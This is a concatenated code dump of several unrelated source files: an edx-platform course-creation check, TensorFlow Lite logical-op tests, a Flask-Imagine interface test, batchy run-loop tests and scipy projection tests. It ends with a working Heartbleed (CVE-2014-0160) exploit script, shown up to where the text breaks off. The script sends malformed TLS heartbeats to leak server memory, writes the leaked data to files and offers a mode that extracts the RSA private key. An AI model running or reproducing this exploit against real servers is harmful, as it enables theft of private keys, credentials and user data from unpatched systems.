    added with status 'unrequested' if the course creator group is in use.
    """
    # Staff members can always create courses, regardless of feature flags.
    if user.is_staff:
        return 'granted'
    if settings.FEATURES.get('DISABLE_COURSE_CREATION', False):
        return 'disallowed_for_this_site'
    if not settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
        # No creator group in use: everyone may create courses.
        return 'granted'
    status = get_course_creator_status(user)
    if status is None:
        # User not grandfathered in as an existing user, has not previously
        # visited the dashboard page. Register them as 'unrequested'.
        add_user_with_status_unrequested(user)
        status = get_course_creator_status(user)
    return status
| hamzehd/edx-platform | cms/djangoapps/contentstore/views/course.py | Python | agpl-3.0 | 67,900 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for logic operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
def _make_logical_tests(op):
  """Make a set of tests to do logical operations.

  Args:
    op: a binary TF logical op (e.g. tf.logical_or) applied to two bool
      tensors.

  Returns:
    A callable `logical(options, expected_tf_failures=0)` that generates the
    test cases for `op` and zips them.
  """

  def logical(options, expected_tf_failures=0):
    """Generate examples."""
    # Shape pairs cover scalars, identical shapes and broadcasting; some
    # pairs look broadcast-incompatible -- presumably the source of the
    # callers' expected_tf_failures=1 (TODO confirm).
    test_parameters = [{
        "input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
                             ([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
                             ([5, 5], [1]), ([10], [2, 4, 10])],
    }]

    def build_graph(parameters):
      """Build the logical testing graph."""
      input_value1 = tf.compat.v1.placeholder(
          dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
      input_value2 = tf.compat.v1.placeholder(
          dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
      out = op(input_value1, input_value2)
      return [input_value1, input_value2], [out]

    def build_inputs(parameters, sess, inputs, outputs):
      """Feed random bool data for both inputs and run the graph once."""
      input_value1 = create_tensor_data(tf.bool,
                                        parameters["input_shape_pair"][0])
      input_value2 = create_tensor_data(tf.bool,
                                        parameters["input_shape_pair"][1])
      return [input_value1, input_value2], sess.run(
          outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))

    make_zip_of_tests(
        options,
        test_parameters,
        build_graph,
        build_inputs,
        expected_tf_failures=expected_tf_failures)

  return logical
@register_make_test_function()
def make_logical_or_tests(options):
  """Make a set of tests to do logical_or."""
  generate = _make_logical_tests(tf.logical_or)
  return generate(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
  """Make a set of tests to do logical_and."""
  generate = _make_logical_tests(tf.logical_and)
  return generate(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
  """Make a set of tests to do logical_xor, test logical_not as well."""
  generate = _make_logical_tests(tf.math.logical_xor)
  return generate(options, expected_tf_failures=1)
| ppwwyyxx/tensorflow | tensorflow/lite/testing/op_tests/logic.py | Python | apache-2.0 | 3,152 |
import unittest
from flask.ext.imagine.filters.interface import ImagineFilterInterface
class TestImagineFilterInterface(unittest.TestCase):
    """The abstract filter interface must refuse to be applied directly."""

    interface = None

    def setUp(self):
        self.interface = ImagineFilterInterface()

    def test_not_implemented_apply_method(self):
        # apply() is abstract on the interface and must raise until overridden.
        self.assertRaises(NotImplementedError, self.interface.apply, '')
| FlaskGuys/Flask-Imagine | tests/filters/test_interface.py | Python | mit | 375 |
import sys
from unittest.case import SkipTest
from batchy.compat import PY3
from batchy.local import RunLoopLocal
from batchy.runloop import coro_return, runloop_coroutine, deferred, future, current_run_loop, wait
from . import BaseTestCase
@runloop_coroutine()
def increment(arg):
    """Coroutine: resolve to arg + 1."""
    coro_return(arg + 1)
    yield  # unreachable; present only so this function is a generator
@runloop_coroutine()
def add_2(arg):
    """Coroutine: resolve to arg + 2 by chaining two increment() calls."""
    for _ in range(2):
        arg = yield increment(arg)
    coro_return(arg)
    yield  # unreachable; keeps this a generator
@runloop_coroutine()
def return_none():
    """Coroutine: explicitly resolve to None."""
    coro_return(None)
    yield  # unreachable; present only so this function is a generator
@runloop_coroutine()
def raise_value_error():
    """Coroutine: always fail with ValueError."""
    raise ValueError()
    yield  # pylint: disable-msg=W0101
@runloop_coroutine()
def block_loop(n):
    """Blocks the run loop for n iterations."""
    d = yield deferred()
    # Mutable cell so the nested closure can decrement the counter.
    cnt = [n]

    def unblock(_):
        # Fires once per queue-exhausted signal; resolves after n firings.
        cnt[0] -= 1
        if cnt[0] == 0:
            d.set_value(1)

    with current_run_loop().on_queue_exhausted.connected_to(unblock):
        yield d
class RunLoopTests(BaseTestCase):
    """Exercises the batchy run loop: coroutine scheduling, dependency
    resolution (single/list/dict yields), run-loop locals, deferreds,
    futures and wait()."""

    def test_simple_runnable(self):
        """A coroutine's resolved value is returned synchronously."""
        self.assert_equal(1, increment(0))
        self.assert_equal(2, increment(1))

    def test_simple_runnable_py3(self):
        """Python 3 `return value` inside a generator behaves like coro_return."""
        if not PY3:
            raise SkipTest()

        # exec() keeps the py3-only syntax from breaking py2 at import time.
        exec("""
@runloop_coroutine()
def increment_py3(arg):
    return arg + 1
    yield
""", locals(), globals())

        self.assert_equal(1, increment_py3(0))
        self.assert_equal(2, increment_py3(1))

    def test_dependencies(self):
        """A coroutine may yield sub-coroutines sequentially."""
        self.assert_equal(2, add_2(0))
        self.assert_equal(3, add_2(1))

    def test_list_dependencies(self):
        """Yielding several coroutines at once resolves all of them."""
        @runloop_coroutine()
        def add_2_parallel(arg):
            arg1, arg2 = yield increment(arg), increment(0)
            coro_return(arg1+arg2)

        self.assert_equal(2, add_2_parallel(0))
        self.assert_equal(3, add_2_parallel(1))

    def test_list_dependency_ordering(self):
        """Coroutines yielded as a list run in submission order."""
        result = []

        @runloop_coroutine()
        def append(x):
            result.append(x)
            yield

        @runloop_coroutine()
        def test():
            yield [append(x) for x in range(100)]

        test()
        self.assert_equals(list(range(100)), result)

    def test_dict_dependencies(self):
        """Yielding a dict of coroutines resolves to a dict of results."""
        @runloop_coroutine()
        def add_2_dict(arg):
            d = yield {'a': increment(arg), 'b': increment(0), 'c': return_none()}
            self.assert_equal(None, d['c'])
            coro_return(d['a'] + d['b'])

        self.assert_equal(2, add_2_dict(0))
        self.assert_equal(3, add_2_dict(1))

    def test_no_dependencies(self):
        """A coroutine that never calls coro_return resolves to None."""
        @runloop_coroutine()
        def coro():
            yield

        self.assert_equals(None, coro())

    def test_local(self):
        """RunLoopLocal works inside a loop and is reset between runs."""
        local = RunLoopLocal()

        @runloop_coroutine()
        def test():
            local.hi = getattr(local, 'hi', 0) + 1
            local.hello = 'boo'
            del local.hello
            coro_return((local.hi, getattr(local, 'hello', None)))
            yield

        def set_something():
            local.hi = 1

        # Locals may only be touched while a run loop is active.
        self.assert_raises(RuntimeError, set_something)
        # Second run sees hi == 1 again, proving state did not leak.
        self.assert_equals((1, None), test())
        self.assert_equals((1, None), test())

    def test_exception(self):
        """Exceptions from a yielded coroutine surface at the yield point."""
        @runloop_coroutine()
        def test(a):
            try:
                yield raise_value_error()
            except ValueError:
                v = yield increment(a)
                coro_return(v)

        self.assert_equals(2, test(1))
        self.assert_equals(3, test(2))

    def test_multiple_exception(self):
        """A failing member of a parallel yield raises at the yield point."""
        @runloop_coroutine()
        def test(a):
            err = raise_value_error()
            try:
                yield err, block_loop(1)
            except ValueError:
                v = yield increment(a)
                coro_return(v)

        self.assert_equals(2, test(1))
        self.assert_equals(3, test(2))

    def test_deferred_simple(self):
        """A deferred blocks its consumer until set_value() is called."""
        obj = [None]

        @runloop_coroutine()
        def task():
            obj[0] = d = yield deferred()
            if __debug__:
                # Reading an unset deferred is an error.
                self.assert_raises(ValueError, d.get)
            v = yield d
            coro_return(v)

        def set_value(_):
            obj[0].set_value(3)

        @runloop_coroutine()
        def test():
            with current_run_loop().on_queue_exhausted.connected_to(set_value):
                v = yield task()
                coro_return(v)

        self.assert_equal(3, test())

    def test_deferred_easy(self):
        """A deferred resolved before being yielded returns immediately."""
        obj = [None]

        @runloop_coroutine()
        def task():
            obj[0] = d = yield deferred()
            d.set_value(3)
            v = yield d
            coro_return(v)

        @runloop_coroutine()
        def test():
            v = yield task()
            coro_return(v)

        self.assert_equal(3, test())

    def test_deferred_exception(self):
        """set_exception() on a deferred re-raises in the consumer."""
        obj = [None]

        @runloop_coroutine()
        def task():
            obj[0] = d = yield deferred()
            v = yield d
            coro_return(v)

        def set_value(_):
            try:
                raise ValueError()
            except ValueError:
                # Capture the full (type, value, traceback) triple.
                obj[0].set_exception(*sys.exc_info())

        @runloop_coroutine()
        def test():
            with current_run_loop().on_queue_exhausted.connected_to(set_value):
                v = yield task()
                coro_return(v)

        @runloop_coroutine()
        def test2():
            with current_run_loop().on_queue_exhausted.connected_to(set_value):
                x = test()
                try:
                    yield x
                except ValueError:
                    coro_return(1)

        self.assert_raises(ValueError, test)
        self.assert_equals(1, test2())

    def test_block_loop(self):
        """block_loop() consumes one run-loop iteration per unblock."""
        total_iterations = [0]

        def inc_total_iterations(_):
            total_iterations[0] += 1

        @runloop_coroutine()
        def test():
            with current_run_loop().on_iteration.connected_to(inc_total_iterations):
                yield block_loop(1)
                yield block_loop(1)
                yield block_loop(1)
                coro_return(1)

        self.assert_equal(1, test())
        self.assert_equal(total_iterations[0], 4-1)  # the first loop isn't counted.

    def test_future(self):
        """future() starts work eagerly; results are collected later."""
        total_iterations = [0]

        def inc_total_iterations(_):
            total_iterations[0] += 1

        @runloop_coroutine()
        def test():
            with current_run_loop().on_iteration.connected_to(inc_total_iterations):
                v1 = yield future(block_loop(1))
                v2 = yield future(block_loop(1))
                v3 = yield future(block_loop(1))
                # Creating futures alone must not advance the loop.
                self.assert_equal(0, total_iterations[0])
                yield v1, v2, v3
                coro_return(1)

        self.assert_equal(1, test())
        self.assert_equal(total_iterations[0], 2-1)

    def test_future_exception(self):
        """A failing future raises only when its result is yielded."""
        total_iterations = [0]

        def inc_total_iterations(_):
            total_iterations[0] += 1

        @runloop_coroutine()
        def test():
            with current_run_loop().on_iteration.connected_to(inc_total_iterations):
                exc = yield future(raise_value_error())
                v1 = yield future(block_loop(1))
                v2 = yield future(block_loop(1))
                v3 = yield future(block_loop(1))
                self.assert_equal(0, total_iterations[0])
                try:
                    yield exc
                except ValueError:
                    self.assert_equal(0, total_iterations[0])
                yield v1, v2, v3
                coro_return(1)

        self.assert_equal(1, test())
        self.assert_equal(total_iterations[0], 2-1)

    def test_future_exception_ignore(self):
        """An initially-ignored failing future still propagates when yielded."""
        @runloop_coroutine()
        def test():
            exc, _, _ = yield future(raise_value_error()), future(block_loop(1)), future(block_loop(1))
            try:
                yield exc
            except ValueError:
                raise

        self.assert_raises(ValueError, test)

    def test_ready_wait(self):
        """wait(count=n) returns as soon as n awaited items are ready."""
        @runloop_coroutine()
        def test():
            d1, d2, d3 = yield deferred(), deferred(), deferred()
            d1.set_value(1)
            # An exception also counts as "ready".
            d2.set_exception(ValueError())
            ready = yield wait([d1, d2, d3], count=2)
            self.assert_in(d1, ready)
            self.assert_in(d2, ready)

        test()

    def test_wait_until_blocked(self):
        """wait() yields control so queue-exhausted handlers can fire."""
        deferreds = []

        def set_value(_):
            deferreds[0].set_value(1)

        @runloop_coroutine()
        def test():
            with current_run_loop().on_queue_exhausted.connected_to(set_value):
                d = yield deferred()
                deferreds.append(d)
                yield wait([d])

        test()  # shouldn't block

    def test_wait_doesnt_change_list(self):
        """wait() must not mutate the list passed to it."""
        deferreds = []

        def set_value(_):
            deferreds[0].set_value(1)

        @runloop_coroutine()
        def test():
            with current_run_loop().on_queue_exhausted.connected_to(set_value):
                d = yield deferred()
                deferreds.append(d)
                d2 = yield deferred()
                d2.set_value(2)
                ready = yield wait([d, d2], count=1)
                self.assert_equals(1, len(ready))
                ready2 = yield wait([d], count=1)
                # The first result list must still hold exactly one entry.
                self.assert_equals(1, len(ready))
                self.assert_equals(1, len(ready2))

        test()
| mikekap/batchy | tests/runloop_tests.py | Python | apache-2.0 | 9,494 |
import numpy as np
import scipy.linalg
from scipy.sparse import csc_matrix
from scipy.optimize._trustregion_constr.projections \
import projections, orthogonality
from numpy.testing import (TestCase, assert_array_almost_equal,
assert_equal, assert_allclose)
try:
from sksparse.cholmod import cholesky_AAt
sksparse_available = True
available_sparse_methods = ("NormalEquation", "AugmentedSystem")
except ImportError:
sksparse_available = False
available_sparse_methods = ("AugmentedSystem",)
available_dense_methods = ('QRFactorization', 'SVDFactorization')
class TestProjections(TestCase):
    """Tests for the projections() factory: null-space (Z), least-squares
    (LS) and row-space (Y) operators, over every available dense and
    sparse factorization method."""

    def test_nullspace_and_least_squares_sparse(self):
        """Z maps into null(A); LS solves the A.T least-squares problem (sparse input)."""
        A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                            [0, 8, 7, 0, 1, 5, 9, 0],
                            [1, 0, 0, 0, 0, 1, 2, 3]])
        At_dense = A_dense.T
        A = csc_matrix(A_dense)
        test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
                       [1, 10, 3, 0, 1, 6, 7, 8],
                       [1.12, 10, 0, 0, 100000, 6, 0.7, 8])

        for method in available_sparse_methods:
            Z, LS, _ = projections(A, method)
            for z in test_points:
                # Test if x is in the null_space
                x = Z.matvec(z)
                assert_array_almost_equal(A.dot(x), 0)
                # Test orthogonality
                assert_array_almost_equal(orthogonality(A, x), 0)
                # Test if x is the least square solution
                x = LS.matvec(z)
                x2 = scipy.linalg.lstsq(At_dense, z)[0]
                assert_array_almost_equal(x, x2)

    def test_iterative_refinements_sparse(self):
        """With tiny orth_tol and many refinements, Z stays accurate (sparse)."""
        A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                            [0, 8, 7, 0, 1, 5, 9, 0],
                            [1, 0, 0, 0, 0, 1, 2, 3]])
        A = csc_matrix(A_dense)
        # Last point is nearly (but not exactly) in the row space.
        test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
                       [1, 10, 3, 0, 1, 6, 7, 8],
                       [1.12, 10, 0, 0, 100000, 6, 0.7, 8],
                       [1, 0, 0, 0, 0, 1, 2, 3+1e-10])

        for method in available_sparse_methods:
            Z, LS, _ = projections(A, method, orth_tol=1e-18, max_refin=100)
            for z in test_points:
                # Test if x is in the null_space
                x = Z.matvec(z)
                # Scale the tolerance with the magnitude of the result.
                atol = 1e-13 * abs(x).max()
                assert_allclose(A.dot(x), 0, atol=atol)
                # Test orthogonality
                assert_allclose(orthogonality(A, x), 0, atol=1e-13)

    def test_rowspace_sparse(self):
        """Y solves A x = z with x inside the row space of A (sparse input)."""
        A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                            [0, 8, 7, 0, 1, 5, 9, 0],
                            [1, 0, 0, 0, 0, 1, 2, 3]])
        A = csc_matrix(A_dense)
        test_points = ([1, 2, 3],
                       [1, 10, 3],
                       [1.12, 10, 0])

        for method in available_sparse_methods:
            _, _, Y = projections(A, method)
            for z in test_points:
                # Test if x is solution of A x = z
                x = Y.matvec(z)
                assert_array_almost_equal(A.dot(x), z)
                # Test if x is in the return row space of A
                A_ext = np.vstack((A_dense, x))
                assert_equal(np.linalg.matrix_rank(A_dense),
                             np.linalg.matrix_rank(A_ext))

    def test_nullspace_and_least_squares_dense(self):
        """Z maps into null(A); LS solves the A.T least-squares problem (dense input)."""
        A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                      [0, 8, 7, 0, 1, 5, 9, 0],
                      [1, 0, 0, 0, 0, 1, 2, 3]])
        At = A.T
        test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
                       [1, 10, 3, 0, 1, 6, 7, 8],
                       [1.12, 10, 0, 0, 100000, 6, 0.7, 8])

        for method in available_dense_methods:
            Z, LS, _ = projections(A, method)
            for z in test_points:
                # Test if x is in the null_space
                x = Z.matvec(z)
                assert_array_almost_equal(A.dot(x), 0)
                # Test orthogonality
                assert_array_almost_equal(orthogonality(A, x), 0)
                # Test if x is the least square solution
                x = LS.matvec(z)
                x2 = scipy.linalg.lstsq(At, z)[0]
                assert_array_almost_equal(x, x2)

    def test_compare_dense_and_sparse(self):
        """Dense and sparse code paths agree on a 100x400 block-diagonal A."""
        D = np.diag(range(1, 101))
        A = np.hstack([D, D, D, D])
        A_sparse = csc_matrix(A)
        np.random.seed(0)

        Z, LS, Y = projections(A)
        Z_sparse, LS_sparse, Y_sparse = projections(A_sparse)
        for k in range(20):
            z = np.random.normal(size=(400,))
            assert_array_almost_equal(Z.dot(z), Z_sparse.dot(z))
            assert_array_almost_equal(LS.dot(z), LS_sparse.dot(z))
            x = np.random.normal(size=(100,))
            assert_array_almost_equal(Y.dot(x), Y_sparse.dot(x))

    def test_compare_dense_and_sparse2(self):
        """Dense and sparse code paths agree on a small 3x9 matrix."""
        D1 = np.diag([-1.7, 1, 0.5])
        D2 = np.diag([1, -0.6, -0.3])
        D3 = np.diag([-0.3, -1.5, 2])
        A = np.hstack([D1, D2, D3])
        A_sparse = csc_matrix(A)
        np.random.seed(0)

        Z, LS, Y = projections(A)
        Z_sparse, LS_sparse, Y_sparse = projections(A_sparse)
        for k in range(1):
            z = np.random.normal(size=(9,))
            assert_array_almost_equal(Z.dot(z), Z_sparse.dot(z))
            assert_array_almost_equal(LS.dot(z), LS_sparse.dot(z))
            x = np.random.normal(size=(3,))
            assert_array_almost_equal(Y.dot(x), Y_sparse.dot(x))

    def test_iterative_refinements_dense(self):
        """With tiny orth_tol and extra refinements, Z stays accurate (dense)."""
        A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                      [0, 8, 7, 0, 1, 5, 9, 0],
                      [1, 0, 0, 0, 0, 1, 2, 3]])
        test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
                       [1, 10, 3, 0, 1, 6, 7, 8],
                       [1, 0, 0, 0, 0, 1, 2, 3+1e-10])

        for method in available_dense_methods:
            Z, LS, _ = projections(A, method, orth_tol=1e-18, max_refin=10)
            for z in test_points:
                # Test if x is in the null_space
                x = Z.matvec(z)
                assert_allclose(A.dot(x), 0, rtol=0, atol=2.5e-14)
                # Test orthogonality
                assert_allclose(orthogonality(A, x), 0, rtol=0, atol=5e-16)

    def test_rowspace_dense(self):
        """Y solves A x = z with x inside the row space of A (dense input)."""
        A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                      [0, 8, 7, 0, 1, 5, 9, 0],
                      [1, 0, 0, 0, 0, 1, 2, 3]])
        test_points = ([1, 2, 3],
                       [1, 10, 3],
                       [1.12, 10, 0])

        for method in available_dense_methods:
            _, _, Y = projections(A, method)
            for z in test_points:
                # Test if x is solution of A x = z
                x = Y.matvec(z)
                assert_array_almost_equal(A.dot(x), z)
                # Test if x is in the return row space of A
                A_ext = np.vstack((A, x))
                assert_equal(np.linalg.matrix_rank(A),
                             np.linalg.matrix_rank(A_ext))
class TestOrthogonality(TestCase):
    """Tests for the orthogonality() measure on dense and sparse matrices.

    Both tests use the same 3x8 matrix and the same fixture vectors, which
    are (numerically) orthogonal to its row space, so orthogonality(A, x)
    is expected to be ~0 in every case.
    """

    # Shared fixture: one matrix...
    _A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
                         [0, 8, 7, 0, 1, 5, 9, 0],
                         [1, 0, 0, 0, 0, 1, 2, 3]])
    # ...and (vector, expected orthogonality) pairs.
    _test_cases = [
        ([-1.98931144, -1.56363389,
          -0.84115584, 2.2864762,
          5.599141, 0.09286976,
          1.37040802, -0.28145812], 0),
        ([697.92794044, -4091.65114008,
          -3327.42316335, 836.86906951,
          99434.98929065, -1285.37653682,
          -4109.21503806, 2935.29289083], 0),
    ]

    def _check_orthogonality(self, A):
        """Assert orthogonality(A, x) matches the expectation for each fixture vector."""
        for x, expected_orth in self._test_cases:
            assert_array_almost_equal(orthogonality(A, x), expected_orth)

    def test_dense_matrix(self):
        """orthogonality() on a plain ndarray."""
        self._check_orthogonality(self._A_dense)

    def test_sparse_matrix(self):
        """orthogonality() on the same matrix in CSC sparse format."""
        self._check_orthogonality(csc_matrix(self._A_dense))
| WarrenWeckesser/scipy | scipy/optimize/_trustregion_constr/tests/test_projections.py | Python | bsd-3-clause | 8,820 |
#!/usr/bin/env python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
# -added option to have verbose output
# -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command
# -added option for hex output
# -added option to output raw data to a file
# -added option to output ascii data to a file
# -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
# -added tls version auto-detection
# -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
# -requires following modules: gmpy, pyasn1
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
import time
import os
from optparse import OptionParser
# Command-line interface: all behaviour of the tool is driven by these flags.
options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')

opts, args = options.parse_args()

# Key extraction needs bignum math (gmpy) and DER encoding (pyasn1); import
# them lazily so the common case runs without those extras installed.
if opts.extractkey:
    import base64, gmpy
    from pyasn1.codec.der import encoder
    from pyasn1.type.univ import *
def hex2bin(arr):
    """Pack a list of integer byte values into a raw byte string (Python 2)."""
    return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
# TLS minor-version byte (as sent on the wire) -> human-readable name.
tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
def build_client_hello(tls_ver):
    """Return a TLS ClientHello as a list of byte values.

    `tls_ver` is the minor-version byte (0x01..0x03, see tls_versions); it
    is spliced into both the record header and the handshake body. The
    hello advertises 51 cipher suites and, crucially, the Heartbeat
    extension at the end.
    """
    client_hello = [
        # TLS header ( 5 bytes)
        0x16,               # Content type (0x16 for handshake)
        0x03, tls_ver,      # TLS Version
        0x00, 0xdc,         # Length
        # Handshake header
        0x01,               # Type (0x01 for ClientHello)
        0x00, 0x00, 0xd8,   # Length
        0x03, tls_ver,      # TLS Version
        # Random (32 byte)
        0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
        0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
        0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
        0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
        0x00,               # Session ID length
        0x00, 0x66,         # Cipher suites length
        # Cipher suites (51 suites)
        0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
        0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
        0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
        0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
        0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
        0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
        0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
        0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
        0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
        0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
        0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
        0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
        0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
        0x01,               # Compression methods length
        0x00,               # Compression method (0x00 for NULL)
        0x00, 0x49,         # Extensions length
        # Extension: ec_point_formats
        0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
        # Extension: elliptic_curves
        0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
        0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
        0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
        0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
        0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
        0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
        0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
        # Extension: SessionTicket TLS
        0x00, 0x23, 0x00, 0x00,
        # Extension: Heartbeat
        0x00, 0x0f, 0x00, 0x01, 0x01
    ]
    return client_hello
def build_heartbeat(tls_ver):
    """Return the malformed heartbeat request as a list of byte values.

    The record carries only a 3-byte payload but claims a 0x4000-byte
    payload length -- a vulnerable server echoes back ~16KB of process
    memory (the heartbleed trigger).
    """
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Length
        # Payload
        0x01,           # Type (Request)
        0x40, 0x00      # Payload length
    ]
    return heartbeat
# Open output dump files up front, in append mode so repeated runs accumulate.
if opts.rawoutfile:
    rawfileOUT = open(opts.rawoutfile, "a")
if opts.asciioutfile:
    asciifileOUT = open(opts.asciioutfile, "a")
# Key extraction implies quiet mode: the dump output would only add noise.
if opts.extractkey:
    opts.donotdisplay = True
def hexdump(s):
    """Format leaked bytes for display.

    With -x, returns a classic offset/hex/ascii dump. Otherwise returns a
    printable-ascii rendering (keeping CR/LF) with long runs of filler
    dots stripped; in that mode the text is also appended to the -a file.
    """
    pdat = ''
    hexd = ''
    # Walk the buffer 16 bytes at a time.
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        if opts.hexdump:
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
            hexd += ' %04x: %-48s %s\n' % (b, hxdat, pdat)
        else:
            # Keep printable chars plus LF (10) and CR (13); dot the rest.
            pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
    if opts.hexdump:
        return hexd
    else:
        # Drop runs of 50+ dots -- they are just uninteresting filler.
        pdat = re.sub(r'([.]{50,})', '', pdat)
        if opts.asciioutfile:
            asciifileOUT.write(pdat)
        return pdat
def rcv_tls_record(s):
    """Read one complete TLS record from socket `s`.

    Returns (content_type, version, message_bytes), or (None, None, None)
    on EOF, short read, or any socket/parse error.
    """
    try:
        # Fixed 5-byte record header: type (1), version (2), length (2).
        tls_header = s.recv(5)
        if not tls_header:
            print 'Unexpected EOF (header)'
            return None,None,None
        typ,ver,length = struct.unpack('>BHH',tls_header)
        message = ''
        # recv() may return partial data; loop until the whole body arrives.
        while len(message) != length:
            message += s.recv(length-len(message))
            if not message:
                print 'Unexpected EOF (message)'
                return None,None,None
        if opts.verbose:
            print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
        return typ,ver,message
    except Exception as e:
        print "\nError Receiving Record! " + str(e)
        return None,None,None
def hit_hb(s, targ, firstrun, supported):
    """Send one malformed heartbeat on `s` and classify the server's reply.

    Returns the leaked data (raw bytes in extract-key mode, otherwise the
    hexdump() rendering) or '' when the server appears unaffected.

    NOTE(review): `supported` arrives from bleed() as the boolean True, so
    build_heartbeat() always gets version byte 0x01 (TLSv1.0) regardless of
    the negotiated version; the version code `num` was probably intended --
    confirm against the caller.
    """
    s.send(hex2bin(build_heartbeat(supported)))
    while True:
        typ, ver, pay = rcv_tls_record(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return ''
        if typ == 24:  # heartbeat record
            if opts.verbose:
                print 'Received heartbeat response...'
            # Anything beyond the 3 bytes we sent is leaked server memory.
            if len(pay) > 3:
                if firstrun or opts.verbose:
